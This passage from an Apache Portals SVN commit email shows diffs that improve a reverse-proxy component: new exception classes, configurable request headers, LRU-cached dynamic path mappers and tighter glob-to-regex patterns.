-30,7 +30,7 @@ import org.apache.portals.applications.webcontent.proxy.impl.DefaultHttpReverseProxyPathMapperImpl; import org.apache.portals.applications.webcontent.proxy.impl.DefaultHttpReverseProxyPathMapperProviderImpl; import org.apache.portals.applications.webcontent.proxy.impl.DefaultReverseProxyRewritingContext; -import org.apache.portals.applications.webcontent.proxy.impl.PassMappingLinkRewritingParserAaptor; +import org.apache.portals.applications.webcontent.proxy.impl.DefaultReverseProxyLinkRewritingParserAaptor; import org.apache.portals.applications.webcontent.rewriter.RewriterController; import org.apache.portals.applications.webcontent.rewriter.rules.Ruleset; import org.slf4j.Logger; @@ -66,8 +66,8 @@ @Override public void setUp() { - apacheProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("apache", "/*_apache/", "http://$1.apache.org/"); - localhostProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("localhost", "/localhost/", "http://www.localhost.com/"); + apacheProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("apache", "/*_apache/", "http://$1.apache.org/", null); + localhostProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("localhost", "/localhost/", "http://www.localhost.com/", null); Map<HttpReverseProxyPathMapper, RewriterController> rewriterControllerMap = new HashMap<HttpReverseProxyPathMapper, RewriterController>(); Map<HttpReverseProxyPathMapper, Ruleset> rewriterRulesetMap = new HashMap<HttpReverseProxyPathMapper, Ruleset>(); @@ -85,7 +85,7 @@ proxyPathMapperProvider, "/webcontent/rproxy"); - PassMappingLinkRewritingParserAaptor parserAdaptor = new PassMappingLinkRewritingParserAaptor(); + DefaultReverseProxyLinkRewritingParserAaptor parserAdaptor = new DefaultReverseProxyLinkRewritingParserAaptor(); parserAdaptor.setReverseProxyRewritingContext(rewritingContext); StringReader reader = new StringReader(html); Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties?rev=821934&r1=821933&r2=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties (original) +++ portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties Mon Oct 5 17:50:07 2009 @@ -68,7 +68,11 @@ # Proxy Pass Reverse Mapping configurations for each category # ... Put the path item names here. Each path item will be evaluated by the order. -proxy.reverse.pass = apache, localhost, somewhere +proxy.reverse.pass = apache, localhost, somewhere +# ... Set cache count of proxy path mappers which are dynamically created by glob style mappings. +proxy.reverse.pass.dynamicProxyPathMapperCacheCount = 1000 +# ... Set max matching path part count +proxy.reverse.pass.maxMatchingPathPartCount = 2 # ... Sets detail attributes for each path item. @@ -76,11 +80,9 @@ proxy.reverse.pass.apache.remote = http://$1.apache.org/ proxy.reverse.pass.apache.rewriter.basic = org.apache.portals.applications.webcontent.rewriter.WebContentRewriter proxy.reverse.pass.apache.rewriter.parserAdaptor = html -# ... SimpleLinkRewritingParserAaptor rewrites links only based on its remote base URLs, -# ... while PassMappingLinkRewritingParserAaptor rewrites links based on all reverse proxy pass mappings. -#proxy.reverse.pass.apache.rewriter.parserAdaptor.html = org.apache.portals.applications.webcontent.proxy.impl.SimpleLinkRewritingParserAaptor -proxy.reverse.pass.apache.rewriter.parserAdaptor.html = org.apache.portals.applications.webcontent.proxy.impl.PassMappingLinkRewritingParserAaptor +proxy.reverse.pass.apache.rewriter.parserAdaptor.html = org.apache.portals.applications.webcontent.proxy.impl.DefaultReverseProxyLinkRewritingParserAaptor proxy.reverse.pass.apache.rewriter.parserAdaptor.html.mimeType = text/html +proxy.reverse.pass.apache.rewriter.parserAdaptor.html.property.lookUpAllMappings = true proxy.reverse.pass.localhost.local = /localhost/ proxy.reverse.pass.localhost.remote = http://localhost:8080/ @@ -98,3 +100,5 @@ proxy.reverse.pass.somewhere.rewriter.parserAdaptor.xml.mimeType = text/xml proxy.reverse.pass.somewhere.rewriter.ruleMappings = /WEB-INF/conf/rewriter-rules-mapping.xml proxy.reverse.pass.somewhere.rewriter.rules = /WEB-INF/conf/default-rewriter-rules.xml +proxy.reverse.pass.somewhere.request.header.Accept-Language = en +proxy.reverse.pass.somewhere.request.header.X-Custom-Header = A custom value From [email protected] Mon Oct 05 17:51:13 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61501 invoked from network); 5 Oct 2009 17:51:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Oct 2009 17:51:13 -0000 Received: (qmail 26417 invoked by uid 500); 5 Oct 2009 17:51:13 -0000 Delivered-To: [email protected] Received: (qmail 26364 invoked by uid 500); 5 Oct 2009 17:51:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 26340 invoked by uid 99); 5 Oct 2009 17:51:12 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Oct 2009 17:51:12 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Oct 2009 17:51:00 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 7EF2623888E8; Mon, 5 Oct 2009 17:50:08 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r821934 [1/2] - in /portals/applications/webcontent/trunk: webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/ webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/ webcontent-jar/src... Date: Mon, 05 Oct 2009 17:50:07 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: woonsan Date: Mon Oct 5 17:50:07 2009 New Revision: 821934 URL: http://svn.apache.org/viewvc?rev=821934&view=rev Log: APA-17: Improves reverse proxy component. - Proper 404 handling - Omitting Content-Length when rewriting happens - Request headers are configurable for each proxy target host. - Enhances the default text line based parser adaptor classes hierarchy - Rewriters, ParserAdaptors are properties-settable for sophisticated uses. - Optimizing proxy path mapper selection. Added: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyException.java (with props) portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyNotFoundException.java (with props) portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/AbstractReverseProxyTextLinesParserAdaptor.java (with props) portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultReverseProxyLinkRewritingParserAaptor.java (contents, props changed) - copied, changed from r821705, portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/AbstractTextLinesParserAdaptor.java (with props) Removed: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/SimpleLinkRewritingParserAaptor.java Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyService.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/SSOSiteCredentialsProvider.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/MappingClasspathRewriterController.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/MappingRewriterController.java portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties Added: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyException.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyException.java?rev=821934&view=auto ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyException.java (added) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyException.java Mon Oct 5 17:50:07 2009 @@ -0,0 +1,75 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.portals.applications.webcontent.proxy; + +/** + * The <CODE>HttpReverseProxyException</CODE> class defines a general exception + * that an http reverse proxy component can throw when it is unable to perform its operation + * successfully. + * + * @version $Id$ + */ +public class HttpReverseProxyException extends Exception { + + private static final long serialVersionUID = 1L; + + /** + * Constructs a new HttpReverseProxyException exception. + */ + public HttpReverseProxyException() { + super(); + } + + /** + * Constructs a new HttpReverseProxyException exception with the given message. + * + * @param message + * the exception message + */ + public HttpReverseProxyException(String message) { + super(message); + } + + /** + * Constructs a new HttpReverseProxyException exception with the nested exception. + * + * @param nested + * the nested exception + */ + public HttpReverseProxyException(Throwable nested) { + super(nested); + } + + /** + * Constructs a new HttpReverseProxyException exception when the container needs to do + * the following: + * <ul> + * <li>throw an exception + * <li>include the "nested" exception + * <li>include a description message + * </ul> + * + * @param msg + * the exception message + * @param nested + * the nested exception + */ + public HttpReverseProxyException(String msg, Throwable nested) { + super(msg, nested); + } + +} Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyException.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyException.java ------------------------------------------------------------------------------ svn:keywords = Id Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyException.java ------------------------------------------------------------------------------ svn:mime-type = text/plain Added: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyNotFoundException.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyNotFoundException.java?rev=821934&view=auto ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyNotFoundException.java (added) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyNotFoundException.java Mon Oct 5 17:50:07 2009 @@ -0,0 +1,75 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.portals.applications.webcontent.proxy; + +/** + * The <CODE>HttpReverseProxyNotFoundException</CODE> class defines a not-found-exception + * that an http reverse proxy component can throw when it is unable to find web resources + * successfully. + * + * @version $Id$ + */ +public class HttpReverseProxyNotFoundException extends HttpReverseProxyException { + + private static final long serialVersionUID = 1L; + + /** + * Constructs a new HttpReverseProxyNotFoundException exception. + */ + public HttpReverseProxyNotFoundException() { + super(); + } + + /** + * Constructs a new HttpReverseProxyNotFoundException exception with the given message. + * + * @param message + * the exception message + */ + public HttpReverseProxyNotFoundException(String message) { + super(message); + } + + /** + * Constructs a new HttpReverseProxyNotFoundException exception with the nested exception. + * + * @param nested + * the nested exception + */ + public HttpReverseProxyNotFoundException(Throwable nested) { + super(nested); + } + + /** + * Constructs a new HttpReverseProxyNotFoundException exception when the container needs to do + * the following: + * <ul> + * <li>throw an exception + * <li>include the "nested" exception + * <li>include a description message + * </ul> + * + * @param msg + * the exception message + * @param nested + * the nested exception + */ + public HttpReverseProxyNotFoundException(String msg, Throwable nested) { + super(msg, nested); + } + +} Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyNotFoundException.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyNotFoundException.java ------------------------------------------------------------------------------ svn:keywords = Id Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyNotFoundException.java ------------------------------------------------------------------------------ svn:mime-type = text/plain Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java?rev=821934&r1=821933&r2=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java Mon Oct 5 17:50:07 2009 @@ -16,6 +16,8 @@ */ package org.apache.portals.applications.webcontent.proxy; +import java.util.Map; + /** * proxy path mapper interface for http reverse proxy service. @@ -59,4 +61,10 @@ */ public String getLocalPath(String remoteURL); + /** + * Returns default request headers to the remote URL target. + * @return + */ + public Map<String, String> getDefaultRequestHeaders(); + } \ No newline at end of file Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java?rev=821934&r1=821933&r2=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java Mon Oct 5 17:50:07 2009 @@ -16,8 +16,6 @@ */ package org.apache.portals.applications.webcontent.proxy; -import java.util.List; - import org.apache.portals.applications.webcontent.rewriter.RewriterController; import org.apache.portals.applications.webcontent.rewriter.rules.Ruleset; @@ -54,9 +52,9 @@ public Ruleset getRewriterRuleset(HttpReverseProxyPathMapper proxyPathMapper); /** - * Returns unmodifiable proxy path mappers. + * Returns the maximum matching path part count. * @return */ - public List<HttpReverseProxyPathMapper> getProxyPathMappers(); + public int getMaxMatchingPathPartCount(); } \ No newline at end of file Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyService.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyService.java?rev=821934&r1=821933&r2=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyService.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyService.java Mon Oct 5 17:50:07 2009 @@ -34,6 +34,6 @@ public void destroy(); - public void invoke(HttpServletRequest request, HttpServletResponse response) throws IOException; + public void invoke(HttpServletRequest request, HttpServletResponse response) throws HttpReverseProxyException, IOException; } Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/SSOSiteCredentialsProvider.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/SSOSiteCredentialsProvider.java?rev=821934&r1=821933&r2=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/SSOSiteCredentialsProvider.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/SSOSiteCredentialsProvider.java Mon Oct 5 17:50:07 2009 @@ -16,7 +16,6 @@ */ package org.apache.portals.applications.webcontent.proxy; -import java.net.URI; import java.util.List; import javax.servlet.http.HttpServletRequest; Added: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/AbstractReverseProxyTextLinesParserAdaptor.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/AbstractReverseProxyTextLinesParserAdaptor.java?rev=821934&view=auto ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/AbstractReverseProxyTextLinesParserAdaptor.java (added) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/AbstractReverseProxyTextLinesParserAdaptor.java Mon Oct 5 17:50:07 2009 @@ -0,0 +1,78 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.portals.applications.webcontent.proxy.impl; + +import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapper; +import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapperProvider; +import org.apache.portals.applications.webcontent.proxy.ReverseProxyRewritingContext; +import org.apache.portals.applications.webcontent.proxy.ReverseProxyRewritingContextAware; +import org.apache.portals.applications.webcontent.rewriter.AbstractTextLinesParserAdaptor; + + +/** + * AbstractReverseProxyTextLinesParserAdaptor + * + * @version $Id$ + */ +public abstract class AbstractReverseProxyTextLinesParserAdaptor extends AbstractTextLinesParserAdaptor implements ReverseProxyRewritingContextAware +{ + + private ReverseProxyRewritingContext reverseProxyRewritingContext; + private String rewritingContextPath; + private HttpReverseProxyPathMapperProvider proxyPathMapperProvider; + private int maxMatchingPathPartCount; + private HttpReverseProxyPathMapper proxyPathMapper; + + public void setReverseProxyRewritingContext(ReverseProxyRewritingContext reverseProxyRewritingContext) + { + this.reverseProxyRewritingContext = reverseProxyRewritingContext; + + if (this.reverseProxyRewritingContext != null) + { + rewritingContextPath = reverseProxyRewritingContext.getRewritingContextPath(); + proxyPathMapperProvider = this.reverseProxyRewritingContext.getHttpReverseProxyPathMapperProvider(); + maxMatchingPathPartCount = proxyPathMapperProvider.getMaxMatchingPathPartCount(); + proxyPathMapper = this.reverseProxyRewritingContext.getHttpReverseProxyPathMapper(); + } + } + + protected ReverseProxyRewritingContext getReverseProxyRewritingContext() + { + return reverseProxyRewritingContext; + } + + protected String getRewritingContextPath() + { + return rewritingContextPath; + } + + protected HttpReverseProxyPathMapperProvider getHttpReverseProxyPathMapperProvider() + { + return proxyPathMapperProvider; + } + + protected int getMaxMatchingPathPartCount() + { + return maxMatchingPathPartCount; + } + + protected HttpReverseProxyPathMapper getHttpReverseProxyPathMapper() + { + return proxyPathMapper; + } + +} Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/AbstractReverseProxyTextLinesParserAdaptor.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/AbstractReverseProxyTextLinesParserAdaptor.java ------------------------------------------------------------------------------ svn:keywords = Id Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/AbstractReverseProxyTextLinesParserAdaptor.java ------------------------------------------------------------------------------ svn:mime-type = text/plain Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java?rev=821934&r1=821933&r2=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java Mon Oct 5 17:50:07 2009 @@ -16,6 +16,8 @@ */ package org.apache.portals.applications.webcontent.proxy.impl; +import java.util.Map; + import org.apache.commons.lang.StringUtils; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapper; @@ -29,14 +31,16 @@ private String name; private String localBasePath; private String remoteBaseURL; + private Map<String, String> defaultRequestHeaders; private int hash; - public DefaultHttpReverseProxyPathMapperImpl(String name, String localBasePath, String remoteBaseURL) + public DefaultHttpReverseProxyPathMapperImpl(String name, String localBasePath, String remoteBaseURL, Map<String, String> defaultRequestHeaders) { this.name = name; this.localBasePath = localBasePath; this.remoteBaseURL = remoteBaseURL; + this.defaultRequestHeaders = defaultRequestHeaders; hash = new StringBuilder(40).append(name).append(':').append(localBasePath).append(':').append(remoteBaseURL).toString().hashCode(); } @@ -75,6 +79,11 @@ return null; } + public Map<String, String> getDefaultRequestHeaders() + { + return defaultRequestHeaders; + } + @Override public int hashCode() { @@ -99,4 +108,5 @@ return false; } + } Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java?rev=821934&r1=821933&r2=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java Mon Oct 5 17:50:07 2009 @@ -24,6 +24,7 @@ import java.util.regex.Matcher; import java.util.regex.Pattern; +import org.apache.commons.collections.map.LRUMap; import org.apache.commons.lang.StringUtils; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapper; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapperProvider; @@ -42,18 +43,34 @@ private static String [] GLOB_EXPR_SEARCHES = { "*", ".", "/", "?", "+" }; - private static String [] GLOB_EXPR_REPLACES = { "(.+)", "\\.", "\\/", "\\?", "\\+" }; + private static String [] GLOB_EXPR_REPLACES = { "([^\\/]+)", "\\.", "\\/", "\\?", "\\+" }; private static String [] GROUP_REF_SEARCHES = { "$1", "$2", "$3", "$4", "$5", "$6", "$7", "$8", "$9" }; - private static String [] GROUP_REF_REPLACES = { "(.+)", "(.+)", "(.+)", "(.+)", "(.+)", "(.+)", "(.+)", "(.+)", "(.+)" }; + private static String [] GROUP_REF_REPLACES = { "([^\\/]+)", "([^\\/]+)", "([^\\/]+)", "([^\\/]+)", "([^\\/]+)", + "([^\\/]+)", "([^\\/]+)", "([^\\/]+)", "([^\\/]+)" }; private static Logger log = LoggerFactory.getLogger(DefaultHttpReverseProxyPathMapperProviderImpl.class); /** - * Proxy path mappers + * Maximum matching path part count */ - private List<HttpReverseProxyPathMapper> proxyPathMappers; + private int maxMatchingPathPartCount = 2; + + /** + * Static proxy path mappers + */ + private Map<String, HttpReverseProxyPathMapper> staticProxyPathMappersMap; + + /** + * Dynamic proxy path mappers + */ + private Map dynamicProxyPathMappersMap; + + /** + * Maximum size of dynamic proxy path map + */ + private int dynamicProxyPathMapperCacheCount; /** * Proxy path Glob mappers @@ -78,37 +95,93 @@ Map<HttpReverseProxyPathMapper, RewriterController> rewriterControllerMap, Map<HttpReverseProxyPathMapper, Ruleset> rewriterRulesetMap) { + this(proxyPathMappers, 1000, rewriterControllerMap, rewriterRulesetMap); + } + + public DefaultHttpReverseProxyPathMapperProviderImpl(List<HttpReverseProxyPathMapper> proxyPathMappers, + int dynamicProxyPathMapperCacheCount, + Map<HttpReverseProxyPathMapper, RewriterController> rewriterControllerMap, + Map<HttpReverseProxyPathMapper, Ruleset> rewriterRulesetMap) + { + this.dynamicProxyPathMapperCacheCount = dynamicProxyPathMapperCacheCount; this.rewriterControllerMap = rewriterControllerMap; this.rewriterRulesetMap = rewriterRulesetMap; - this.proxyPathMappers = Collections.synchronizedList(new ArrayList<HttpReverseProxyPathMapper>()); + this.staticProxyPathMappersMap = new HashMap<String, HttpReverseProxyPathMapper>(); + this.dynamicProxyPathMappersMap = Collections.synchronizedMap(new LRUMap(this.dynamicProxyPathMapperCacheCount)); this.proxyPathGlobMappers = new ArrayList<HttpReverseProxyPathMapper>(); + this.localBasePathGlobPatternMap = Collections.synchronizedMap(new HashMap<HttpReverseProxyPathMapper, Pattern>()); + this.remoteBaseURLGlobPatternMap = Collections.synchronizedMap(new HashMap<HttpReverseProxyPathMapper, Pattern>()); + for (HttpReverseProxyPathMapper proxyPathMapper : proxyPathMappers) { + String localBasePath = proxyPathMapper.getLocalBasePath(); + String remoteBaseURL = proxyPathMapper.getRemoteBaseURL(); + if (!StringUtils.contains(proxyPathMapper.getLocalBasePath(), '*')) { - this.proxyPathMappers.add(proxyPathMapper); + staticProxyPathMappersMap.put(StringUtils.removeEnd(localBasePath, "/"), proxyPathMapper); + staticProxyPathMappersMap.put(StringUtils.removeEnd(remoteBaseURL, "/"), proxyPathMapper); } else { this.proxyPathGlobMappers.add(proxyPathMapper); + + try + { + String expr = StringUtils.replaceEach(proxyPathMapper.getLocalBasePath(), GLOB_EXPR_SEARCHES, GLOB_EXPR_REPLACES); + localBasePathGlobPatternMap.put(proxyPathMapper, Pattern.compile(expr)); + expr = StringUtils.replaceEach(proxyPathMapper.getRemoteBaseURL(), GLOB_EXPR_SEARCHES, GLOB_EXPR_REPLACES); + expr = StringUtils.replaceEach(expr, GROUP_REF_SEARCHES, GROUP_REF_REPLACES); + remoteBaseURLGlobPatternMap.put(proxyPathMapper, Pattern.compile(expr)); + } + catch (Exception e) + { + if (log.isDebugEnabled()) + { + log.error("Failed to create regular expression pattern for " + proxyPathMapper.getLocalBasePath(), e); + } + else + { + log.error("Failed to create regular expression pattern for {}. {}", proxyPathMapper.getLocalBasePath(), e); + } + } } } - - this.localBasePathGlobPatternMap = Collections.synchronizedMap(new HashMap<HttpReverseProxyPathMapper, Pattern>()); - this.remoteBaseURLGlobPatternMap = 